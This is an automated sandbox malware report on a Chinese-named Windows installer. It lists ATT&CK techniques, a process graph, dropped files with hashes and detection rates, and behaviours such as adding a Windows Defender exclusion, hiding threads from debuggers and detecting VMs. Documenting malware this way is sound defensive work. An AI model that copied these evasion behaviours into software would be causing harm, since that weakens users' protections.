Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0056AB2A GetSystemTimeAsFileTime,9_2_0056AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00600090 GetVersion,9_2_00600090

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory431
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)111
Process Injection		241
Virtualization/Sandbox Evasion		Security Account Manager241
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API		Login Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem45
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580551 Sample: #U5b89#U88c5#U7a0b#U5e8f_1.... Startdate: 25/12/2024 Architecture: WINDOWS Score: 92 92 Multi AV Scanner detection for dropped file 2->92 94 Multi AV Scanner detection for submitted file 2->94 96 Found driver which could be used to inject code into processes 2->96 98 2 other signatures 2->98 10 #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 90 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, PE32 10->90 dropped 19 #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp 3 5 10->19         started        23 Conhost.exe 10->23         started        25 sc.exe 1 13->25         started        27 sc.exe 1 15->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 sc.exe 1 17->33         started        35 27 other processes 17->35 process5 file6 76 C:\Users\user\AppData\Local\...\update.vbc, PE32 19->76 dropped 78 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->78 dropped 100 Adds a directory exclusion to Windows Defender 19->100 37 #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe 2 19->37         started        40 powershell.exe 23 19->40         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 conhost.exe 35->53         started        55 26 other processes 35->55 signatures7 process8 file9 80 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, PE32 37->80 dropped 57 #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp 4 15 37->57         started        102 Loading BitLocker PowerShell Module 40->102 61 conhost.exe 40->61         started        63 WmiPrvSE.exe 40->63         started        signatures10 process11 file12 82 C:\Users\user\AppData\Local\...\update.vbc, PE32 57->82 dropped 84 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 57->84 dropped 86 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 57->86 dropped 88 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 57->88 dropped 104 Query firmware table information (likely to detect VMs) 57->104 106 Protects its processes via BreakOnTermination flag 57->106 108 Hides threads from debuggers 57->108 110 Contains functionality to hide a thread from the debugger 57->110 65 7zr.exe 2 57->65         started        68 7zr.exe 7 57->68         started        signatures13 process14 file15 74 C:\Program Files (x86)\...\tProtect.dll, PE32+ 65->74 dropped 70 conhost.exe 65->70         started        72 conhost.exe 68->72         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe10%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc26%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc38%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbc26%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbc26%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exefalse
    		high
    https://www.remobjects.com/ps#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F0FB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000000.2109976636.00000000002F1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000000.2129491702.000000000076D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drfalse
      		high
      https://www.innosetup.com/#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F0FB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000000.2109976636.00000000002F1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000000.2129491702.000000000076D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580551
        Start date and time:2024-12-25 04:30:06 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 23s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
        renamed because original name is a hash value
        Original Sample Name:_1.1.2.exe
        Detection:MAL
        Classification:mal92.evad.winEXE@142/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 27
        • Number of non-executed functions: 116
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe
        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 23.64.59.120, 23.64.59.136, 13.85.23.206, 13.107.246.63
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, dns.msftncsi.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        22:30:57API Interceptor1x Sleep call for process: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp modified
        22:30:59API Interceptor21x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b2.0.6.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b2.0.7.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b2.0.5.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b2.0.4.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b2.0.3.exeGet hashmaliciousUnknownBrowse
                            C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeGet hashmaliciousUnknownBrowse

                                    Created / dropped Files

                                    C:\Program Files (x86)\Windows NT\7zr.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):831200
                                    Entropy (8bit):6.671005303304742
                                    Encrypted:false
                                    SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                    MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                    SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                    SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                    SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Joe Sandbox View:
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Windows NT\file.dat (copy)

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2816881
                                    Entropy (8bit):7.999933043989355
                                    Encrypted:true
                                    SSDEEP:49152:ZBrHFbLMoMCEikwqNJq19boUCFCLzBAZJROkR+8nWn80/E7mWF1U/I9:ZpHF8AEi9UUCOBCROoNn08087momq
                                    MD5:30DAC62C861E3FE4F2E8AD658111B19D
                                    SHA1:C9146F70AB0EB27E51D3DBDF903CBAAEDF8C98FF
                                    SHA-256:72F3161CF0EA21DA1C58A372B113F4C1B4685B1707B035FA0BFC46491864942A
                                    SHA-512:69F680EB3A130DC4C1F377F20A484EFB526DD4A9AAD7FE1CB82AD80AEBB86E2B4F1E8259FF35A3D87C93B504C888F96030853033A88522B497344813CCA7F7C8
                                    Malicious:false
                                    Preview:.@S.......i........................C.-.v......t.{.9.....D ....3.'*...R......)@........^.edA^..0.Zh.......@_a>O..?'.............?.H.,...].Q.8.-..[...u..l.....F..E..*.S.Z;.....Z0.w...A..z*_..... .g..u.g..1.Ku...r.5..OL.H".Hx...G...\..6.,.`..HB.?.v..H. ..\N.....ix..Q.......n.RB......u.3\=hp......^vQ...o;..sm.T...u.....eNd.N...`W(c(>....m.._.O..v..!H....P.J......kO.U.kv.4.......v.i...........g...r.....fu....Q..'..x.)f.).{......bPm.W.........9x....E.!...'......."....;8......f$.$,....)'.....vZ.mc....N..%z...B.;.......|v.{..H......B^..'..'.<.rD..........Bl.S.K..\.......4.'...0.\....~......>>_.._*J.V...].... ...N4.U.+..........\|.?.....q......](.n/.*xV.+<......}].E8..._...ZXr.Yy.. ?..Ur....G.=.<.%....SO..i5S.........s......X.....LY.M.....H...D`.....(F...`..7...A7...WB*.....~...1.8.RI.k"+..o1.1/\\J3....NZ?T. .]..C?[W]...6.w@.u........}...0$Y....`8<.8.u=..{...[.M)..~.\..3...X....\pmh.....K...J...EZx;`.*...j..(.<..\.g2.....a..<....j|.V.........r....

                                    C:\Program Files (x86)\Windows NT\hrsw.vbc

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3621376
                                    Entropy (8bit):7.006090025798393
                                    Encrypted:false
                                    SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                    MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                    SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                    SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                    SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 26%
                                    • Antivirus: Virustotal, Detection: 38%, Browse
                                    Joe Sandbox View:
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                                    • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Windows NT\is-BAR93.tmp

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2816881
                                    Entropy (8bit):7.999933043989355
                                    Encrypted:true
                                    SSDEEP:49152:ZBrHFbLMoMCEikwqNJq19boUCFCLzBAZJROkR+8nWn80/E7mWF1U/I9:ZpHF8AEi9UUCOBCROoNn08087momq
                                    MD5:30DAC62C861E3FE4F2E8AD658111B19D
                                    SHA1:C9146F70AB0EB27E51D3DBDF903CBAAEDF8C98FF
                                    SHA-256:72F3161CF0EA21DA1C58A372B113F4C1B4685B1707B035FA0BFC46491864942A
                                    SHA-512:69F680EB3A130DC4C1F377F20A484EFB526DD4A9AAD7FE1CB82AD80AEBB86E2B4F1E8259FF35A3D87C93B504C888F96030853033A88522B497344813CCA7F7C8
                                    Malicious:false
                                    Preview:.@S.......i........................C.-.v......t.{.9.....D ....3.'*...R......)@........^.edA^..0.Zh.......@_a>O..?'.............?.H.,...].Q.8.-..[...u..l.....F..E..*.S.Z;.....Z0.w...A..z*_..... .g..u.g..1.Ku...r.5..OL.H".Hx...G...\..6.,.`..HB.?.v..H. ..\N.....ix..Q.......n.RB......u.3\=hp......^vQ...o;..sm.T...u.....eNd.N...`W(c(>....m.._.O..v..!H....P.J......kO.U.kv.4.......v.i...........g...r.....fu....Q..'..x.)f.).{......bPm.W.........9x....E.!...'......."....;8......f$.$,....)'.....vZ.mc....N..%z...B.;.......|v.{..H......B^..'..'.<.rD..........Bl.S.K..\.......4.'...0.\....~......>>_.._*J.V...].... ...N4.U.+..........\|.?.....q......](.n/.*xV.+<......}].E8..._...ZXr.Yy.. ?..Ur....G.=.<.%....SO..i5S.........s......X.....LY.M.....H...D`.....(F...`..7...A7...WB*.....~...1.8.RI.k"+..o1.1/\\J3....NZ?T. .]..C?[W]...6.w@.u........}...0$Y....`8<.8.u=..{...[.M)..~.\..3...X....\pmh.....K...J...EZx;`.*...j..(.<..\.g2.....a..<....j|.V.........r....

                                    C:\Program Files (x86)\Windows NT\locale.bin

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):56514
                                    Entropy (8bit):7.996192844152609
                                    Encrypted:true
                                    SSDEEP:1536:Af2p56rS/DpbGo5YM8KCF9wnVHalZQkMiHzN:Af2pD/Dpd5YMWq5aYWHzN
                                    MD5:76A87B3550627ACE10DF48ECD5537029
                                    SHA1:D34842F146058E6D12FDCB41296819B0A10FB153
                                    SHA-256:581D714F4E7545712390695EEFFED03F87F765AE4DCA475B0312287309BF649E
                                    SHA-512:D57B6ABA9EB143E079BECED4D4EBD941E3961E1A8279DF17C39CE816242030821F9BAAF0C30988D5C7EEE27ABED4EE588089B65EAA828CCEBAFD5C83F1D992C0
                                    Malicious:false
                                    Preview:.@S.....^.. ...............3...O..h%....x....2.4.C.WZ..w.W...#.......J..d.6....\.. ..xkG.k......~..<~.........q(......8..o...0f..k..\....m....u..=.4.:....j..P.....%c..rQq../"..t..i.3.`..i..z...P.b..bc.IO...*$*+.D.O7.cH.pi=Thi.Sg..?D..;..{.L..C.d......C.t)Z.r-.p7.=v...b...@<F;..X.jv...6....8.-.......#,~y.\.......#j..-:...Uo..3".ri.U...9+...5...8~p..}......~[........._..2W.?.)M.O.O3.-Y0c.E.[...._]..._*A.......E...~..z..ke.-.N..-.....4.i.SH.%ac..#.S.......e..\3..z.,...CC...u.J1...{..2.T8...l......9S6.b.zL,Y..>.S...*..._..k...x..{..P...n_..LeP.... .|.#.D.PK.7.),2...z.W6..eu.....V...v...s.>O.>r7.~..9b..........W..Z..:...|.C.....F.............Gk^...x1..3S].f.CS.(.%X....V.3....)..............\s...)k..S.b>.m..BH..QZ.F.4M...2k.....D..<.E ..uc4.$....('.......].~......+...C.IKs5...h...W.4......M9../r..X|}.....@..}..a9.........VJ....H.....H|.G.<...2...?...~._Fl.:.....,.34..f..N.:.n...L..."..u..C0...D..X...9X.3..|.v.T.......'..bu.l...l.

                                    C:\Program Files (x86)\Windows NT\locale.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):56514
                                    Entropy (8bit):7.996192844152606
                                    Encrypted:true
                                    SSDEEP:768:BRzzwFFBJ/XghYQ6peMARgkAAgne1ttjDz7bfzRTBozKyYP2oBXa6g:BRqaYQyapAA71ttjD7zpJvXi
                                    MD5:F3DAC8AF8FA59C160B8B538FAF3F0A8F
                                    SHA1:D85BC8165C09EB7B64359CB6615D32CBB4F6142A
                                    SHA-256:591885182DD1E3348C8228BE438AADF9C62611F52AB5E7D267AB556E5533D852
                                    SHA-512:8FFECB53FF972F1854F62E4CD75E9683BEAE1FF9931E6047DE2A2A25C13CF3D72BF6EA89B21E0C27EBBE3C4AF91A64ACB7D8C33E88398B079A5FF089D092D535
                                    Malicious:false
                                    Preview:7z..'.../.8hp.......2.........O.W.E#..OHQx.0O.I.8.+[.... a.N......#..UH...D....t.5..O.:G[...c.!.W.f....#R..!..]$h.QK^c....AS^qr.N..\~...~.u...F.R.t.O....i.p...[...>;.%.V..[..\(....\.......u...+...+.2.SP0.B........S="......n..#z.........L...QF.[...9E.w.A...zp.X.<.%..}...........!J`.....e7.6..!Mv-.h....q..9..8^TD.....Pk"<.A/ng..V..t.;..GL..G..+.QE...xa..wU<..HX.$..=Sq..Sq...#i-...X$r.~........T..k...\}.....1....G..."9..nY..89.q5..M.U..A..y.'..q.{..s....u...8.vG..d........aF..~..|..v.C.R}....D..$&R+!8C...?.... ..C..T.7.A...+.'...kV.z.._./..ig...E.^..>...W.9i....B.......D...R..S2Q....-=.l+,[.O.X..:E...F.ha1.?..+/._..t...9..Y.....L.)6".Uyd.....K....}6..X%.......x.]...b..s...I.RH...H.+d.R.....i.l,V....{.2k.....H..,..........H...hpEU>d._A.E..l"...t...?Q8..!*_.>.5.....*b.j...C.^$......o~S..r.K...QEEO/..\z.]e....$;&O...8f..G6....S).s.k..>.D&Z...._...(O...D./.3...3.......$..{.WhF.A...<.?......v...57._..H%.........T.a.M.k......k.0.f.r..F.u.... B<K.-S

                                    C:\Program Files (x86)\Windows NT\locale2.bin

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):56546
                                    Entropy (8bit):7.996966859255975
                                    Encrypted:true
                                    SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                    MD5:CEA69F993E1CE0FB945A98BF37A66546
                                    SHA1:7114365265F041DA904574D1F5876544506F89BA
                                    SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                    SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                    Malicious:false
